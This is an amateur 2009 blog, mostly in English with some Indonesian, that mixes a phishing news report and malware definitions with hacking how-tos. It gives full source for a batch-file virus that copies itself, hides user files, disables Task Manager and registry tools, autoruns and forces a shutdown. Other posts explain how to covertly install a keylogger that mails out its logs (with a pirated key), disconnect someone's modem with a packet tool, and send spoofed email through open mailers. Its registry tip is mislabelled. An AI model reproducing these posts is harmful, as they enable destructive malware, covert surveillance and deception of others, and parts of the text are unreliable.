Sabtu, 22 Agustus 2009

Disable or able copy paste,,

This is happen in my computer,, when i was visiting one site,,
my computer suddenly,, hang and after that its turn off automaticly,,
after i turn on it again,, my pc cannot copy(ctrl + c) paste(ctrl + v) cut(ctrl + x),,
and im looking to my registry,, and exactly it has changed by something,,

this the way to disable the function of copy paste,,

1. go to regedit Regedit

2. go to directory HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control\

3. right click on the folder Control and choose New -–> Key

4. rename as “StorageDevicePolicies”

5. right click on that and then choose New –> Dword

6. named “WriteProtect”

7. double click on the Dword named “WriteProtect” , and then change the Value Data into '1'

8. after that restar your computer,,

to make it able(able copy paste again,,) just change 1 into 0,,



Kamis, 14 Mei 2009

ancaman pishing merabah..

Dalam komputerpengelabuan (Inggrisphishing) adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dankartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti pos-el atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing ('memancing'), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna.


Dengan banyaknya kasus pengelabuan yang dilaporkan, metode tambahan atau perlindungan sangat dibutuhkan. Upaya-upaya itu termasuk pembuatan undang-undang, pelatihan pengguna, dan langkah-langkah teknis.JAKARTA,

Contoh pengelabuan: dengan memencet pranala yang diminta, kita akan dibawa ke situs web internet banking dan diminta memasukkan nama pengguna dan nomor pin ke situs web palsu (samaran situs web bank asli)

 KOMPAS.com - Makin hari, virus, trojan, worm, malware makin mengganas. Varian malware pun terus berkembang. Serangan berbasis Web semakin sering terjadi, dan mengancam situs-situs jaringan pertemanan seperti Facebook, Flickr dan Frienster. Begitu juga ancaman spam. Demikian tercantum dalam laporan Internet Security Threat vol. 14 yang dirilis Symantec di Jakarta (6/5).

Laporan untuk kurun Januari 2008 – Desember 2008 yang dibacakan oleh Ronnie Ng (Manager, Systems Engineering, Indonesia & Singapore, Symantec) itu mengungkapkan hal mengejutkan. Indonesia ternyata duduk di peringkat 8 dalam daftar Top 10 Phishing Site. Sebagai situs phishing, negara kita itu mengalahkan Malaysia dan Singapura yang masing-masing ada di urutan 9 dan 10. Sementara itu juara pertama adalah Cina, yang diikuti oleh Korea Selatan, Taiwan, dan Jepang. 

“Indonesia tercatat dalam daftar 10 Besar. Ini akibat semakin banyaknya kegiatan perbankan online yang dilakukan oleh pengguna,” kata Ronnie. “Hati-hati mengakses situs online bank, seperti Klik BCA dan Bank Mandiri. Jangan sekali-kali mengirimkan data dan password ketika diminta dengan alasan pembaruan,” saran Albert Lay. 

Sektor keuangan/finansial memang menjadi target utama phishing di tahun 2008, dengan porsi kontribusi 76%. Selain sektor finansial, yang juga banyak diincar adalah ISP dan sektor eceran (ritel), masing-masing 10% dan 8%. “ISP banyak disasar karena kebanyakan orang menggunakan data-data yang sama untuk banyak akun yang dimilikinya, termasuk akun e-mail,” urai Ronnie. 

Selama tahun 2008, kegiatan phishing yang dideteksi Symantec tercatat meningkat 66% dibandingkan tahun sebelumnya, dengan 55.389 situs Web yang terdeteksi.

WIEK

Rabu, 25 Maret 2009

hiding ip adress


Hide something that is easy but also difficult. It is very easy to live because you hide your IP address but you also difficult because many hackers also finally discovered and caught, so do not use it for evil but to use the security self-ber when the Internet.

At the time we connect to the Internet, an IP address will be provided by the ISP and the ISP will also record the user's IP number, when and to whom given. This is what we always make the eyes-matai.

So what do most of the hacker to hide himself? By using the proxy (a computer broker "brokers" between our IP and the target computer).

For example, when you browse to a site via a proxy server xxx, then the server sites that you visit will only record the IP address of the proxy server xxx, and not the IP address of the original you.

Where is safe? Safe because the original IP we will not be known by anyone and also a proxy server xxx not register and access our behavior in the internet which means our original IP directly removed from the proxy server xxx.

This service is often called the anonymouse proxy sites and service providers is that I like is anonymouse.org, the view that simple and easy to use. In fact there are many more service providers this website so stay aja searchable on Google.

At the site of this service you will see a column that is provided to enter a destination address browsing. And the result is different from the original IP address for you. Kan easy?

If you want more secure again, you can combine some of the proxy server but it will make you a connection will be slower.

Selasa, 24 Maret 2009

the differences between internet, intranet, ekstranet

Internet is a network of networks

Intranet is a computer-based network protocol, TCP / IP as the Internet is used only internally in the company, office, and even internet cafes (WARNET) can Categorize the Intranet. Intranet between each other can communicate with each other through an Internet backbone that provides long-distance communication. Akan but actually does not need an Intranet connection to the outside Internet to function properly. Intranet use all the protocol TCP / IP and its application so that we have "private" Internet.

If a body of business / business / institutions expose some of the internal network to the outside community, in this case called Ekstranet. Indeed, all the contents are not usually remove the intranet to the public, to make the intranet into Ekstranet. For example, we are buying software, books etc. from an e-store, then usually we can access the intranet part of the store. Agency business / company can block access to their intranet through a firewall router and laying. Firewall is a software / hardware that someone set the access into the intranet. Protection is done through a variety of parameters if the network IP address, port number etc.. If you enable the firewall in the access can be controlled so that we can only access the Intranet from any part of the company, which was then known as the extranet.

Differences between virus, trojan, backdoor, malware, spyware

Differences between virus, trojan, backdoor, malware, spyware
some of my friends asking the differences between them above..
virusComputer virus is computer program which can duplicate its body and spread. it's spread insert the computer program or another document. Virus computer can be analogyst as a biologist virus which spread and inserting their body into our cell. virus computer can make our data in document broken, make the user of the computer fell disturbed, or doesnt taking any effect.

Commonly computer virus brake our software and can't directly brake our hardware (especially in operating system. like operation windows (Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Servicepack 1, Windows XP Servicepack 2, windows vista) and also GNU/Linux. negative effect of computer virus is when the virus duplicate its body, its decrease the resource of the computer (like memory and CPU time) almost 95% Virus is base on windows operation system. Sisanya 2% attacking Linux/GNU

(and Unix as a source from linux tentunya), 1% atacking Mac especially Mac OS 9, Mac OS X(tiger, Leopard). 2% attacking another sistem operation like FreeBSD, OS/2 IBM, and Sun operating System)

Virus attacks can be prevented by others or by using antivirus software. This type of software can also detect and remove computer viruses, the virus database as long as the computer is owned by the antivirus software already contains the code to remove the virus.

An example is virusnya Worm, Trojan, etc.. Example of a reliable anti-virus and prevent virus is Kaspersky, AVG, AntiVir, PCMAV, Norton, Norman, and McAfee.

Worm

Worm a kind of virus who cannot infect another program. Its make their clone and infect another computer (usually using a network) but it not connecting with another program; but the worm can change or brake the file or program.


Trojan

Trojan is a duplicate or a replica of the virus. Trojan virus entered the program because of the nature of the unwanted and work by itself on a computer. Nature is mengkontrol trojan computer automatically. For example, the computer entered trojan email. Trojan entered in Rats (remote access trojans) where a computer controlled by a particular program, even some trojan work to open the computer that can be entered by computer and diaccess from jauh.Norton, Norman, and McAfee.

Backdoor:

Backdoor or "back door", in the security computer system, refers to mechanisms that can be used to access the system, application, or network, apart from the general mechanism is used (through the logon authentication process or other). Is also called as the back door.


Backdoor initially created by computer programmers as the mechanism that allows them to obtain special access to them in the program, often used to justify and improve the code in the program that they make when a crash occurs due to a bug. One example of this statement is when Kenneth Thompson (one of the UNIX operating system programmers to create a login process in 1983 when it obtained Turing Award), other than the login program is used in common UNIX operating system using the C programming language, so that he can access the UNIX systems that run on the internal network of Bell Labs. Backdoor he created it to protect himself from pendeteksian and disposal of the system, even if the user successfully find it, because the backdoor makes himself again (do rekompilasi own).

Some software developers to add a backdoor in the program for the purpose of buatannya damage (or the purpose of suspicious). For example, a backdoor can be inserted in the code in an online shopping site (e-commerce) to allow the developer to obtain information about transactions that occur between buyers and sellers, including credit cards.


The term now used by the backdoor hacker-hacker to refer to a mechanism that allows the system can access peretas back a system that has been attacked before without having to repeat the process of exploitation of the system or network, as it did the first time. Generally, once a network has been attacked by using the exploit (to a Handling / Vulnerability), an attacker will cover all jejaknya in the system concerned with modifying the file system record (log) or delete it, and then menginstalasikan a backdoor in the form of a software or to add a special user account that has rights to access the network administrator or system administrator.

If the owner and the network or system to realize that the system has been attacked, and then close all Handling is known in the system (but does not detect the existence of the backdoor installed), still before the attacker will be able to access the system, discovered by the owner without the network, especially after registering himself as a legitimate user in the system or network. Have the right as the network administrator, he can do things that can damage the system or remove the data. In cases like the above, a commonly used way is to make re-installation of the system or network, or with the restoration of backup / backup that is still clean from the backdoor. Without having to repeat the previous process of exploitation of the system or network, as it did the first time. Generally, once a network has been attacked by using the exploit (to a Handling / Vulnerability), an attacker will cover all jejaknya in the system concerned with modifying the file system record (log) or delete it, and then menginstalasikan a backdoor in the form of a software or to add a special user account that has rights to access the network administrator or system administrator.

There are some devices that can be used to menginstalasikan backdoor, as well as several Trojan horse, but is popular netcat, which can be used in the operating system Windows or UNIX.

Malware :

"Malware" is a computer program that was created with the purpose and objective search for software weaknesses. Malware is generally created for a break or damage the software or operating system. An example of malware is a Virus, Worm, Wabbit, Keylogger, Browser Hijacker, Trojan Horse, Spyware, Backdoor, Dialer, Exploit, and rootkit.

Spyware:

Spyware is software that collects and sending information about computer users without the user knows that. The information that can not unduly harmful patterns such as berkomputer, especially berinternet, until someone is dangerous, such as credit card numbers, PIN for electronic banking (e-banking) and an account password.


Information on the pattern berinternet, already mentioned, is not unduly dangerous. Sites visited, information was sought, chat in the chat room will be the eyes by the matai-spyware. Furthermore, the information is used to display ads that are usually the form of a pop-up window. Yesterday was related to someone berinternet habits. For example, often search for information about digital cameras. A pop-up window that appears will show, for example, sites that deal in digital camera. Adware is the term for which such spyware. The distribution is similar to spyware Trojan. For example, flashget. When used flashget not diregister, flashget act as spyware. Try just connect themselves to the internet, run the flashget not diregister, computer cuekin some time, certainly the internet explorer a window appears that displays an ad site.

To anticipate many virus on the computer, make sure your computer is always protected with the antivirus up to date ..

Minggu, 08 Maret 2009

disconnect modem


do you hate your friend?? or maybe You just played with him..

hmm.. do you have his IP adress.. so what should you do??

i'll tell you the way how to disconnect our foe modem..

first download from

http://www.ziddu.com/download/3094152/RocketV1_0.exe.html

and just write his IP adress on Target ip.. then SEND PACKET..

Rabu, 04 Maret 2009

how to see an asterix keys / password asterix...



how to see an asterix keys...

u ever seen the asterix keys before.. or a password that using a point or a stars..
like this

sometimes someone after writting a password doesnt erase the cookie or the list..

if you see that..
what would you do??

you want to erase that password!!

wait!!!

why we dont we try to see it..


let me teach u by using a software to see that password..
this name is a snadboy revelation..

first download it from
http://www.snadboy.com/

then install it..
and use it..

get the circle on software into the asterix password


Selasa, 03 Maret 2009

keylogger












do u want to know what the people do in their computer?
Record or shot their desktop.,
or are u a newbie hacker? Just like me..hahaha
This the easiest method how record what the user of computers do..

i will teach u how download and using a keylogger..

This is ardamax keylogger..
using It has more advantage than another keylogger..
¤ its record everything they do in that computer
¤ it is easy to use..
¤ you can report the record to the email or your computer (just like the trojan do)
¤ you can take a shoot from the user desktop.


first install its..
And then u see a symbol on system tray.. Open it.. And insert the registration key that i will give on the last of this session..

Second
set ur email,ftp, or ip to send that record into yours

third
set the password of that keylogger.. And set to hide it on everything(start up, tray, windows).. So only u who can open this keylog

this is the place where u can download it and this is the registration key

http://www.ardamax.com/downloads/setup_akl.exe

Kimberley Ronald
RGA3Y3A-M3D88-T3HU5-T28TM-G47AS-SFTD7-624JC

make a fake email....


are u ever get the email that u never know before..
Or maybe u ever heard that someone
have lied by other people to get his attention..

in this sheet… let me teach u how to make a fake email..

first
let us want a help from our "uncle google"..

second
write this on the search.. "inurl:XcCDONTS.asp"

third
write into who and from who u want sending that email.. write the body...and don't forget to write the subject..(like u sending an email)

if that failed.. you can download the software from

http://www.esnips.com/doc/4577e167-6036-4dff-b6ab-f95a4ba65e66/MiSoSKiaNs-Fake-Mail


i hope u won't using this program to adverse another people

Jumat, 27 Februari 2009

How to make a virus from batch..

How to make a virus from batch..

This information just for the amateur.. Cause i'm still an amateur.. And need to work harder than before..







first open notepad and write (just write what i have bold):



-1st algorithm
if no exist c:\windows\%0 copy %0 c:\windows

-2nd algorithm
for %%q in(A C D E F) do copy %0 %%p:

-3rd algorithm
for %%q in(*.jpg *.doc) do type %0>%%q.bat

-4th algorithm
for %%r in(*.jpg *.doc) do attrib +h +s %%r

-5th algorithm
reg add hkcu\software\microsoft\windows\currentversion\explorer\advanced /v showsuperhiden /t reg_dword /d 1 /f

-6th algorithm
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer/v nofolderoptions /t reg_dword /d 1 /f

-7th algorithm
reg add hkcu\software\microsoft\windows\currentversion\policies\System /v Disabletaskmgr /t reg_dword /d 1 /f

-8th algorithm
reg add hkcu\software\microsoft\windows\currentversion\policies\Explorer /v Nofind /t reg_dword /d 1 /f

-9th algorithm
reg add hkcu\software\microsoft\windows\currentversion\policies\Explorer /v Norun /t
reg_dword /d 1 /f

-10th algorithm
reg add hkcu\software\microsoft\windows\currentversion\run /v Aktifkan /t reg_sz /d c:\windows\virus5.bat /f

-11th algorithm
reg add hkcu\software\microsoft\windows\currentversion\policies\Explorer /v noviewondrive /t reg_dword /d 4 /f

-12th algorithm
reg add hkcu\software\microsoft\windows\System /v Disablecmd /t reg_dword /d 2 /f

-
13th algorithm
reg add hkcu\software\microsoft\windows\currentversion\policies\System /v Disableregistrytools /t reg_dword /d 1 /f

-14th algorithm
shutdown -s -t 60 -c "komputer akan mati" -f

= -s it means shutdown..
can BE changed with -r (restart)
60 is a time before its shutdown
-c"" is used to make a comment.
-f to close all of the program withou warning

-15th algorithm
exit
=to exit from program

dont forget to save it into batch file...

Rabu, 18 Februari 2009

bisnis pulsa.. hohohoho


bagi yang minat bisnis pulsa nih wa kasih sampel harganya...

ini bisnis pulsa dengan deposit termurah loh.. so untung lo pada bisa banyak kan...

Telkomsel
Indosat
Telkom Flexi
KARTU AS A5 6,000
IM-3 I5 5,500
Flexi F5 5,500
A10 11,000
IS5 5,500
F10 10,200
A15 16,100
IS8 8,450
F20 19,700
A25 26,100
I10 10,400





IS15 14,800





I20 19,600
Three
SIMPATI S5 5,900
I25 24,400
Three T5 5,400
S10 10,700
IS30 29,200
T10 10,500
S20 20,200



T20 20,200






T25 25,000



Mentari M5 5,600


PRO XL
M10 10,400


BEBAS X5 5,400
M20 19,600



X10 10,300
M25 24,400



X25 25,000
M50 48,200






M100 95,700






StarOne O10 10,400



EXTRA XX10 10,300
O20 19,600





















Mobile8
Bakrie Esia



Fren R10 10,400
Esia E5 5,500




R25 24,700
E10 10,500







E15 15,200







E20 20,400



AXIS
E25 24,700



AXIS AX10 10,200






AX20 19,800

















Itu yang di kolom kiri sampel harga yang bakal ngurangin deposit lo.. so bisa lo mahalin lagi klo mau dapet untung banyak kan.. ahhahaah....

buat yang mau tau lebih lanjut isi koment aj pasti gw jawab..
or email ke dimas_216@yahoo.com